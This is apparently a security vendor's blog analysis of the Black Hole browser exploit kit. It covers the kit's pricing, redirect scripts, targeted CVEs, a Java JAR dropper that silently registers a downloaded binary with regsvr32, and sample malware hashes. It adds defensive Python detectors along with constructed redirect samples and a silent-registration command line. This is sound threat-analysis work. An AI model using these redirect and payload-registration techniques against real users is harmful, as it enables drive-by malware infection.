Deconstructing the Black Hole Exploit Kit
This month, the science journal Nature published a story on the biggest black hole ever discovered, found by UC Berkeley researchers.
What is the biggest black hole in cyberspace? Imperva's malware dissection team took a careful look at the anatomy of the Black Hole Exploit Kit. In addition to Tomer, Sarit has now joined the team to add a feminine touch to the dissection process.
The new Black Hole exploit kit has been out for a while and we've had a chance to deconstruct it. Before we get super geeky, some general observations about the innovation in this kit:
- Malware developers continue to use the latest tools to encrypt their malware to evade anti-virus (AV) software. As usual, the encryption signature is new, so AV misses it: our analysis showed that 70 percent of AV products would miss this altogether. This serves as a not-so-gentle reminder of the fundamental problem with signature-based AV: the signature changes every week as a new encryption algorithm is used.
- Hackers are deploying resiliency. In the past, we've seen hackers deploy a single exploit server. In this case, there were four, so traffic could be redirected if any one of the URLs was taken down.
What are BEPs?
An exploit kit, or browser exploit pack (BEP), is a toolkit that automates the exploitation of client-side vulnerabilities.
The toolkit is a bundle of PHP and HTML files with a set of exploit files (targeting Java, PDF readers, browsers, Adobe Flash Player, etc.) designed to attack the operating system, browser or other client-side application. Toolkits are usually heavily obfuscated using known or custom obfuscation and encryption tools to avoid detection by anti-virus vendors.
Black Hole is yet another web exploit kit developed by Russian hackers. It is a very powerful kit with a number of recent exploits, including Java and Adobe PDF exploits. One blog published (with updates) a great overview of the best-known exploit packs.
According to The Hacker News, the black market cost of the pack is:
Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author's servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 weeks, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But now it's FREE HERE!
Summary: The Infection Flow
Here’s a breakdown of the infection flow:
The Infection Process
A live exploit pack only requires a victim "drive-by", a trivial site visit, to start the infection process.
The most common method used by Black Hole to spread is via links inside phishing emails. We were no exception:
Once clicked, we get the infamous "WAIT PLEASE LOADING......" page.
We can immediately see the four JS.JS script sources. Each JS.JS contains a redirect to a Black Hole exploit kit server.
We can see that the redirection is achieved with the JavaScript document.location property:
Then the exploit kit checks for vulnerable applications and selects the best exploit.
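The two traits of the landing stage described above, one script name (JS.JS) pulled from several servers for resiliency, and a script body whose only job is a document.location redirect, are easy to check for in a captured page. The following is an added example written for this post, not code from the kit or from Imperva; the landing page and js.js body are constructed samples, and the .invalid hostnames are placeholders rather than real indicators.

```python
import re
from urllib.parse import urlparse

# Constructed sample (not captured from the kit): a landing page of the kind
# described above, with four identically named js.js includes served from four
# different hosts. The .invalid hostnames are placeholders, not real IoCs.
SAMPLE_LANDING_PAGE = """
<html><body>
<h1>WAIT PLEASE LOADING......</h1>
<script type="text/javascript" src="http://kit-a.invalid/js.js"></script>
<script type="text/javascript" src="http://kit-b.invalid/js.js"></script>
<script type="text/javascript" src="http://kit-c.invalid/js.js"></script>
<script type="text/javascript" src="http://kit-d.invalid/js.js"></script>
</body></html>
"""

# Constructed sample: the body of one such js.js, whose only job is to send the
# browser on to the exploit server's landing script.
SAMPLE_JS_JS = 'document.location = "http://kit-a.invalid/main.php?page=abc123";'

SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
LOCATION_RE = re.compile(
    r'(?:document|window)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)


def external_script_sources(html):
    """Absolute (cross-host) script src URLs found in a captured page."""
    return [u for u in SCRIPT_SRC_RE.findall(html) if urlparse(u).netloc]


def redirect_targets(js):
    """URLs assigned to document.location / window.location in a script body."""
    return LOCATION_RE.findall(js)


def multi_host_scripts(html):
    """Script file names that the page includes from more than one host.

    One script name pulled from several servers is the resiliency pattern
    described above: any one include still works if the others are taken down.
    """
    hosts_by_name = {}
    for url in external_script_sources(html):
        parsed = urlparse(url)
        name = parsed.path.rsplit("/", 1)[-1].lower()
        hosts_by_name.setdefault(name, set()).add(parsed.netloc.lower())
    return {name: sorted(h) for name, h in hosts_by_name.items() if len(h) > 1}


def triage(html, fetched_scripts):
    """Summarise a captured landing page plus the script bodies it included.

    fetched_scripts maps each script URL to its body (fetched by the analyst).
    Returns a dict of findings; empty containers mean nothing matched.
    """
    redirects = {}
    for url, body in fetched_scripts.items():
        targets = redirect_targets(body)
        if targets:
            redirects[url] = targets
    return {"multi_host_scripts": multi_host_scripts(html), "redirects": redirects}


if __name__ == "__main__":
    report = triage(SAMPLE_LANDING_PAGE, {"http://kit-a.invalid/js.js": SAMPLE_JS_JS})
    for name, hosts in report["multi_host_scripts"].items():
        print(f"{name} is included from {len(hosts)} hosts: {', '.join(hosts)}")
    for url, targets in report["redirects"].items():
        print(f"{url} redirects the browser to {', '.join(targets)}")
```

The same-name-many-hosts check is the useful one for triage: a legitimate page rarely loads one script from four unrelated domains, whereas the kit does exactly that so that a takedown of one server does not break the chain.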
Deploying the payloads
The BEP searches for several vulnerabilities to propagate itself. By deobfuscating the above JS we can see the following JavaScript functions that reveal the targets. The code extracts the versions of the following installed applications:
Here, the kit checks for the installed OS:
Here, the kit checks for a PDF exploit (CVE-2008-2992/CVE-2009-0927):
Here, the kit checks for a Flash exploit (CVE-2011-0611):
Here, the kit gets a shellcode function:
Here, the kit checks for an HCP exploit (CVE-2010-1885):
The Java JAR Payload
The exploit kit sends heavily obfuscated JavaScript containing a Java applet tag that downloads a malicious JAR file to the infected system.
After uncompressing the JAR file, five Java class files are extracted:
I used the JD decompiler to decompile the class files. Zoom.class attempts to exploit CVE-2010-0840:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
- Once the vulnerability is successfully exploited, the payload downloads another malicious binary (analyzed below) and saves it on the infected system under a random name, <randomName>.exe.
- Silently registers the downloaded binary by calling regsvr32.exe -s <binary.exe>
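The regsvr32 step above is a good detection hook: regsvr32 exists to register COM DLLs and OCX controls, so a silent (-s) invocation whose argument is an .exe dropped under a temp directory is out of place on a normal host. Below is an added example written for this post (not Imperva's code and not part of the kit) that scans process-creation records for that pattern. The log lines are constructed samples in a simple pipe-separated format, the temp-file name is a placeholder, and treating java.exe/javaw.exe as a suspicious parent is an assumption drawn from the JAR payload described above.

```python
# Constructed sample process-creation records (not real telemetry), in the
# format "timestamp|parent image|image|command line". Paths and the random
# file name are placeholders; the Java parent is an assumption based on the
# JAR payload described above.
SAMPLE_PROCESS_LOG = [
    "2011-12-07T10:01:02|C:\\Windows\\explorer.exe"
    "|C:\\Program Files\\Java\\jre6\\bin\\java.exe|java.exe -jar update.jar",
    "2011-12-07T10:01:09|C:\\Program Files\\Java\\jre6\\bin\\java.exe"
    "|C:\\Windows\\System32\\regsvr32.exe"
    "|regsvr32.exe -s C:\\Users\\victim\\AppData\\Local\\Temp\\qj4hx7ka.exe",
    # A benign registration of a vendor OCX control by an installer.
    "2011-12-07T10:05:00|C:\\Windows\\System32\\msiexec.exe"
    "|C:\\Windows\\System32\\regsvr32.exe"
    "|regsvr32.exe /s \"C:\\Program Files\\Vendor\\control.ocx\"",
]

# Assumption: the Java payload is the process that invokes regsvr32.
SUSPICIOUS_PARENTS = {"java.exe", "javaw.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Split one pipe-separated record into its four fields."""
    ts, parent, image, cmd = line.split("|", 3)
    return {"time": ts, "parent": parent, "image": image, "cmd": cmd}


def parse_regsvr32_cmdline(cmd):
    """Return (flags, target path) for a regsvr32 command line, else None.

    Flags are the -x / /x switches; the target is whatever remains, re-joined
    so that paths containing spaces survive the split.
    """
    parts = cmd.split()
    if not parts or basename(parts[0].strip('"')) != "regsvr32.exe":
        return None
    flags = {p[1:].lower() for p in parts[1:] if p[:1] in ("-", "/")}
    target = " ".join(p for p in parts[1:] if p[:1] not in ("-", "/")).strip('"')
    return flags, target


def assess(event):
    """Return a finding dict for a suspicious regsvr32 launch, else None."""
    parsed = parse_regsvr32_cmdline(event["cmd"])
    if parsed is None:
        return None
    flags, target = parsed
    if not target.lower().endswith(".exe"):
        return None  # registering a .dll/.ocx is what regsvr32 is for
    reasons = ["regsvr32 target is an .exe rather than a COM DLL/OCX"]
    if "s" in flags:
        reasons.append("silent flag (-s) suppresses the registration dialog")
    if "\\temp\\" in target.lower():
        reasons.append("target was dropped in a temp directory")
    parent = basename(event["parent"])
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    return {"time": event["time"], "target": target, "reasons": reasons}


def detect(lines):
    """Run assess() over every record and collect the findings."""
    findings = []
    for line in lines:
        finding = assess(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_PROCESS_LOG):
        print(f["time"], f["target"])
        for reason in f["reasons"]:
            print("  -", reason)
```

The benign OCX registration in the sample is deliberately left unflagged: the rule keys on the file type being registered, not on regsvr32 itself, so installers that legitimately use it do not generate noise.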
As noted above, the anti-virus detection rate for the payload is low, with 13 of 43 vendors catching it, a 30.2% success rate.
Successful Exploitation – The Malware
On every successful exploitation the running shellcode downloads and executes a malicious binary (download-and-execute shellcode). We got infected twice.
Sample MD5: 53507987ca9d772c7377a6066259aa7e
Anubis Report: http://goo.gl/LCiCg
Ceeinject / Scar / Kazy
Sample MD5: ba7017bb86b8d37a37479d6460e992f0
Anubis Report: http://goo.gl/NUylt